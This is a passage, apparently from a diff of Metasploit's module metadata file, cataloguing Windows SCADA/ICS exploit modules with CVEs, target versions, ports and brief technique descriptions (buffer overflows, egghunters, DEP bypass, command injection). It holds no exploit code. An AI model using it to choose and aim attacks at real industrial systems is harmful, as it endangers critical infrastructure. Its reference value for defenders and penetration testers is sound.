"exploit/windows/scada/codesys_web_server", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-02", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Celil UNUVER", - "TecR0c ", - "sinn3r ", - "Michael Coppola" - ], - "description": "This module exploits a remote stack buffer overflow vulnerability in\n 3S-Smart Software Solutions product CoDeSys Scada Web Server Version\n 1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and\n earlier.", - "references": [ - "CVE-2011-5007", - "OSVDB-77387", - "URL-http://aluigi.altervista.org/adv/codesys_1-adv.txt", - "EDB-18187", - "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "CoDeSys v2.3 on Windows XP SP3", - "CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/codesys_web_server.rb", - "is_install_path": true, - "ref_name": "windows/scada/codesys_web_server", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/daq_factory_bof": { - "name": "DaqFactory HMI NETB Request Overflow", - "fullname": "exploit/windows/scada/daq_factory_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-09-13", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "mr_me " - ], - "description": "This module exploits a stack buffer overflow in Azeotech's DaqFactory\n product. The specific vulnerability is triggered when sending a specially crafted\n 'NETB' request to port 20034. Exploitation of this vulnerability may take a few\n seconds due to the use of egghunter. 
This vulnerability was one of the 14\n releases discovered by researcher Luigi Auriemma.", - "references": [ - "CVE-2011-3492", - "OSVDB-75496", - "URL-http://aluigi.altervista.org/adv/daqfactory_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-264-01" - ], - "platform": "Windows", - "arch": "", - "rport": 20034, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "DAQFactory Pro 5.85 Build 1853 on Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/daq_factory_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/daq_factory_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/delta_ia_commgr_bof": { - "name": "Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow", - "fullname": "exploit/windows/scada/delta_ia_commgr_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-07-02", - "type": "exploit", - "author": [ - "ZDI", - "t4rkd3vilz", - "hubertwslin" - ], - "description": "This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial\n Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially\n crafted packets. 
This module has been tested successfully on Delta Electronics Delta\n Industrial Automation COMMGR 1.08 over\n Windows XP SP3,\n Windows 7 SP1, and\n Windows 8.1.", - "references": [ - "CVE-2018-10594", - "BID-104529", - "ZDI-18-586", - "ZDI-18-588", - "EDB-44965", - "URL-https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01" - ], - "platform": "Windows", - "arch": "", - "rport": 502, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "COMMGR 1.08 / Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/delta_ia_commgr_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/delta_ia_commgr_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/diaenergie_sqli": { - "name": "DIAEnergie SQL Injection (CVE-2024-4548)", - "fullname": "exploit/windows/scada/diaenergie_sqli", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-05-06", - "type": "exploit", - "author": [ - "Michael Heinzl", - "Tenable" - ], - "description": "SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.\n This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. 
The commands will get executed in the context of NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://www.tenable.com/security/research/tra-2024-13", - "CVE-2024-4548" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 928, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows_Fetch" - ], - "mod_time": "2024-08-19 22:47:19 +0000", - "path": "/modules/exploits/windows/scada/diaenergie_sqli.rb", - "is_install_path": true, - "ref_name": "windows/scada/diaenergie_sqli", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/factorylink_csservice": { - "name": "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow", - "fullname": "exploit/windows/scada/factorylink_csservice", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-25", - "type": "exploit", - "author": [ - "Luigi Auriemma ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found on Siemens FactoryLink 8. 
The\n vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,\n the user-supplied path first gets converted to ANSI format (CodePage 0), and then\n gets handled by a logging routine where proper bounds checking is not done,\n therefore causing a stack-based buffer overflow, and results arbitrary code execution.", - "references": [ - "OSVDB-72812", - "URL-http://aluigi.altervista.org/adv/factorylink_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01" - ], - "platform": "Windows", - "arch": "", - "rport": 7580, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3", - "Windows Server 2003 SP0" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/factorylink_csservice.rb", - "is_install_path": true, - "ref_name": "windows/scada/factorylink_csservice", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/factorylink_vrn_09": { - "name": "Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow", - "fullname": "exploit/windows/scada/factorylink_vrn_09", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "hal", - "MC " - ], - "description": "This module exploits a stack buffer overflow in FactoryLink 7.5, 7.5 SP2,\n and 8.0.1.703. By sending a specially crafted packet, an attacker may be able to\n execute arbitrary code due to the improper use of a vsprintf() function while\n processing the user-supplied text field. 
Originally found and posted by\n Luigi Auriemma.", - "references": [ - "OSVDB-72815", - "URL-http://aluigi.altervista.org/adv/factorylink_4-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01" - ], - "platform": "Windows", - "arch": "", - "rport": 7579, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "FactoryLink 7.5", - "FactoryLink 7.5 SP2", - "FactoryLink 8.0.1.703" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/factorylink_vrn_09.rb", - "is_install_path": true, - "ref_name": "windows/scada/factorylink_vrn_09", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/ge_proficy_cimplicity_gefebt": { - "name": "GE Proficy CIMPLICITY gefebt.exe Remote Code Execution", - "fullname": "exploit/windows/scada/ge_proficy_cimplicity_gefebt", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-01-23", - "type": "exploit", - "author": [ - "amisto0x07", - "Z0mb1E", - "juan vazquez " - ], - "description": "This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the\n CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in\n shared resources. An attacker can abuse this behavior to execute a malicious BCL and\n drop an arbitrary EXE. The last one can be executed remotely through the WebView server.\n This module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded\n CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. 
If\n the target does not have the WebClient service enabled, an external SMB service is necessary.", - "references": [ - "CVE-2014-0750", - "ZDI-14-015", - "URL-http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)" - ], - "mod_time": "2017-09-13 22:03:34 +0000", - "path": "/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb", - "is_install_path": true, - "ref_name": "windows/scada/ge_proficy_cimplicity_gefebt", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/iconics_genbroker": { - "name": "Iconics GENESIS32 Integer Overflow Version 9.21.201.01", - "fullname": "exploit/windows/scada/iconics_genbroker", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Lincoln", - "corelanc0d3r " - ], - "description": "The GenBroker service on port 38080 is affected by three integer overflow\n vulnerabilities while handling opcode 0x4b0, which is caused by abusing the\n the memory allocations needed for the number of elements passed by the client.\n This results unexpected behaviors such as direct registry calls, memory location\n calls, or arbitrary remote code execution. Please note that in order to ensure\n reliability, this exploit will try to open calc (hidden), inject itself into the\n process, and then open up a shell session. 
Also, DEP bypass is supported.", - "references": [ - "OSVDB-72817", - "URL-http://aluigi.org/adv/genesis_4-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02" - ], - "platform": "Windows", - "arch": "", - "rport": 38080, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/iconics_genbroker.rb", - "is_install_path": true, - "ref_name": "windows/scada/iconics_genbroker", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/iconics_webhmi_setactivexguid": { - "name": "ICONICS WebHMI ActiveX Buffer Overflow", - "fullname": "exploit/windows/scada/iconics_webhmi_setactivexguid", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-05-05", - "type": "exploit", - "author": [ - "Scoot Bell ", - "Blair Strang ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in ICONICS WebHMI's ActiveX control.\n By supplying a long string of data to the 'SetActiveXGUID' parameter, GenVersion.dll\n fails to do any proper bounds checking before this input is copied onto the stack,\n which causes a buffer overflow, and results arbitrary code execution under the context\n of the user.", - "references": [ - "CVE-2011-2089", - "OSVDB-72135", - "URL-http://www.security-assessment.com/files/documents/advisory/ICONICS_WebHMI.pdf", - "EDB-17240", - "URL-https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-080-02" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6/7/8 on Windows XP SP3", - "IE 7 on Windows Vista" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb", - "is_install_path": true, - "ref_name": 
"windows/scada/iconics_webhmi_setactivexguid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/igss9_igssdataserver_listall": { - "name": "7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow", - "fullname": "exploit/windows/scada/igss9_igssdataserver_listall", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-03-24", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Lincoln", - "corelanc0d3r ", - "sinn3r " - ], - "description": "This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies\n IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling record\n on the stack, allowing for unauthenticated remote code execution. 
Also, after the payload\n exits, IGSSdataServer.exe should automatically recover.", - "references": [ - "CVE-2011-1567", - "OSVDB-72353", - "URL-http://aluigi.altervista.org/adv/igss_2-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" - ], - "platform": "Windows", - "arch": "", - "rport": 12401, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb", - "is_install_path": true, - "ref_name": "windows/scada/igss9_igssdataserver_listall", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/igss9_igssdataserver_rename": { - "name": "7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow", - "fullname": "exploit/windows/scada/igss9_igssdataserver_rename", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-03-24", - "type": "exploit", - "author": [ - "Luigi Auriemma ", - "sinn3r " - ], - "description": "This module exploits a vulnerability found on 7-Technologies IGSS 9. By supplying\n a long string of data to the 'Rename' (0x02), 'Delete' (0x03), or 'Add' (0x04) command,\n a buffer overflow condition occurs in IGSSdataServer.exe while handing an RMS report,\n which results arbitrary code execution under the context of the user.\n\n The attack is carried out in three stages. The first stage sends the final payload to\n IGSSdataServer.exe, which will remain in memory. The second stage sends the Add command\n so the process can find a valid ID for the Rename command. The last stage then triggers\n the vulnerability with the Rename command, and uses an egghunter to search for the\n shellcode that we sent in stage 1. 
The use of egghunter appears to be necessary due to\n the small buffer size, which cannot even contain our ROP chain and the final payload.", - "references": [ - "CVE-2011-1567", - "OSVDB-72352", - "URL-http://aluigi.altervista.org/adv/igss_5-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" - ], - "platform": "Windows", - "arch": "", - "rport": 12401, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3", - "Windows Server 2003 SP2/R2 SP2" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb", - "is_install_path": true, - "ref_name": "windows/scada/igss9_igssdataserver_rename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/igss9_misc": { - "name": "7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities", - "fullname": "exploit/windows/scada/igss9_misc", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-03-24", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "sinn3r " - ], - "description": "This module exploits multiple vulnerabilities found on IGSS 9's Data Server and\n Data Collector services. 
The initial approach is first by transferring our binary\n with Write packets (opcode 0x0D) via port 12401 (igssdataserver.exe), and then send\n an EXE packet (opcode 0x0A) to port 12397 (dc.exe), which will cause dc.exe to run\n that payload with a CreateProcessA() function as a new thread.", - "references": [ - "CVE-2011-1565", - "CVE-2011-1566", - "OSVDB-72354", - "OSVDB-72349", - "URL-http://aluigi.altervista.org/adv/igss_1-adv.txt", - "URL-http://aluigi.altervista.org/adv/igss_8-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-132-01A" - ], - "platform": "Windows", - "arch": "", - "rport": 0, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP", - "Windows 7", - "Windows Server 2003 / R2" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/igss9_misc.rb", - "is_install_path": true, - "ref_name": "windows/scada/igss9_misc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/igss_exec_17": { - "name": "Interactive Graphical SCADA System Remote Command Injection", - "fullname": "exploit/windows/scada/igss_exec_17", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module abuses a directory traversal flaw in Interactive\n Graphical SCADA System v9.00. 
In conjunction with the traversal\n flaw, if opcode 0x17 is sent to the dc.exe process, an attacker\n may be able to execute arbitrary system commands.", - "references": [ - "CVE-2011-1566", - "OSVDB-72349", - "URL-http://aluigi.org/adv/igss_8-adv.txt" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 12397, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/igss_exec_17.rb", - "is_install_path": true, - "ref_name": "windows/scada/igss_exec_17", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/indusoft_webstudio_exec": { - "name": "InduSoft Web Studio Arbitrary Upload Remote Code Execution", - "fullname": "exploit/windows/scada/indusoft_webstudio_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-11-04", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a lack of authentication and authorization on the InduSoft\n Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to\n the filesystem, by abusing the functions provided by the software.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre\n Vista. 
It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows\n XP SP3 and Windows 2003 SP2.", - "references": [ - "CVE-2011-4051", - "OSVDB-77179", - "BID-50675", - "ZDI-11-330" - ], - "platform": "Windows", - "arch": "", - "rport": 4322, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP / 2003" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/indusoft_webstudio_exec.rb", - "is_install_path": true, - "ref_name": "windows/scada/indusoft_webstudio_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/moxa_mdmtool": { - "name": "MOXA Device Manager Tool 2.1 Buffer Overflow", - "fullname": "exploit/windows/scada/moxa_mdmtool", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-20", - "type": "exploit", - "author": [ - "Ruben Santamarta", - "MC " - ], - "description": "This module exploits a stack buffer overflow in MOXA MDM Tool 2.1.\n When sending a specially crafted MDMGw (MDM2_Gateway) response, an\n attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-4741", - "OSVDB-69027", - "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=70&Itemid=", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-301-01A" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "MOXA MDM Tool 2.1" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/moxa_mdmtool.rb", - "is_install_path": true, - "ref_name": "windows/scada/moxa_mdmtool", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/mypro_cmdexe": { - "name": "mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)", - "fullname": 
"exploit/windows/scada/mypro_cmdexe", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-09-22", - "type": "exploit", - "author": [ - "Michael Heinzl" - ], - "description": "Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06", - "CVE-2023-28384" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows_Fetch" - ], - "mod_time": "2024-07-25 23:54:27 +0000", - "path": "/modules/exploits/windows/scada/mypro_cmdexe.rb", - "is_install_path": true, - "ref_name": "windows/scada/mypro_cmdexe", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/mypro_mgr_cmd": { - "name": "mySCADA myPRO Manager Unauthenticated Command Injection (CVE-2024-47407)", - "fullname": "exploit/windows/scada/mypro_mgr_cmd", - "aliases": [], - "rank": 600, - "disclosure_date": "2024-11-21", - "type": "exploit", - "author": [ - "Michael Heinzl" - ], - "description": "Unauthenticated Command Injection in MyPRO Manager <= v1.2 from mySCADA.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of the myscada9 administrative user that is automatically added by the product.", - "references": [ - "URL-https://www.cisa.gov/news-events/ics-advisories/icsa-24-326-07", - "CVE-2024-47407" - ], - "platform": "Windows", - "arch": "cmd", - 
"rport": 34022, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows_Fetch" - ], - "mod_time": "2025-01-29 20:18:05 +0000", - "path": "/modules/exploits/windows/scada/mypro_mgr_cmd.rb", - "is_install_path": true, - "ref_name": "windows/scada/mypro_mgr_cmd", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/procyon_core_server": { - "name": "Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow", - "fullname": "exploit/windows/scada/procyon_core_server", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-08", - "type": "exploit", - "author": [ - "Knud Hojgaard ", - "mr_me " - ], - "description": "This module exploits a vulnerability in the coreservice.exe component of Proycon\n Core Server <= v1.13. While processing a password, the application\n fails to do proper bounds checking before copying data into a small buffer on the stack.\n This causes a buffer overflow and allows to overwrite a structured exception handling\n record on the stack, allowing for unauthenticated remote code execution. 
Also, after the\n payload exits, Coreservice.exe should automatically recover.", - "references": [ - "CVE-2011-3322", - "OSVDB-75371", - "URL-http://www.stratsec.net/Research/Advisories/Procyon-Core-Server-HMI-Remote-Stack-Overflow" - ], - "platform": "Windows", - "arch": "", - "rport": 23, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 - No dep bypass" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/procyon_core_server.rb", - "is_install_path": true, - "ref_name": "windows/scada/procyon_core_server", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin": { - "name": "DATAC RealWin SCADA Server Buffer Overflow", - "fullname": "exploit/windows/scada/realwin", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-09-26", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.0.10.37).\n By sending a specially crafted FC_INFOTAG/SET_CONTROL packet,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2008-4322", - "OSVDB-48606", - "BID-31418" - ], - "platform": "Windows", - "arch": "", - "rport": 910, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/realwin.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_on_fc_binfile_a": { - "name": "DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_on_fc_binfile_a", - "aliases": [], - "rank": 500, 
- "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a vulnerability found in DATAC Control International RealWin\n SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE\n packet via port 910, RealWin will try to create a file (which would be saved to\n C:\\Program Files\\DATAC\\Real Win\\RW-version\\filename) by first copying the user-\n supplied filename with an inline memcpy routine without proper bounds checking, which\n results a stack-based buffer overflow, allowing arbitrary remote code execution.\n\n Tested version: 2.0 (Build 6.1.8.10)", - "references": [ - "CVE-2011-1563", - "OSVDB-72826", - "BID-46937", - "URL-http://aluigi.altervista.org/adv/realwin_5-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01" - ], - "platform": "Windows", - "arch": "", - "rport": 910, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_on_fc_binfile_a", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_on_fcs_login": { - "name": "RealWin SCADA Server DATAC Login Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_on_fcs_login", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-03-21", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC ", - "B|H " - ], - "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.1 (Build 6.0.10.10) or\n earlier. 
By sending a specially crafted On_FC_CONNECT_FCS_LOGIN\n packet containing a long username, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2011-1563", - "OSVDB-72824", - "URL-http://aluigi.altervista.org/adv/realwin_2-adv.txt", - "URL-http://www.dataconline.com/software/realwin.php", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01" - ], - "platform": "Windows", - "arch": "", - "rport": 910, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/realwin_on_fcs_login.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_on_fcs_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_scpc_initialize": { - "name": "DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_scpc_initialize", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-15", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.", - "references": [ - "OSVDB-68812", - "CVE-2010-4142", - "URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01" - ], - "platform": "Windows", - "arch": "", - "rport": 912, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/realwin_scpc_initialize.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_scpc_initialize", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_scpc_initialize_rf": { - "name": "DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_scpc_initialize_rf", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-15", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a stack buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet, an attacker may be able to execute arbitrary code.", - "references": [ - "OSVDB-68812", - "CVE-2010-4142", - "URL-http://aluigi.altervista.org/adv/realwin_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01" - ], - "platform": "Windows", - "arch": "", - "rport": 912, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_scpc_initialize_rf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/realwin_scpc_txtevent": { - "name": "DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow", - "fullname": "exploit/windows/scada/realwin_scpc_txtevent", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-11-18", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a stack 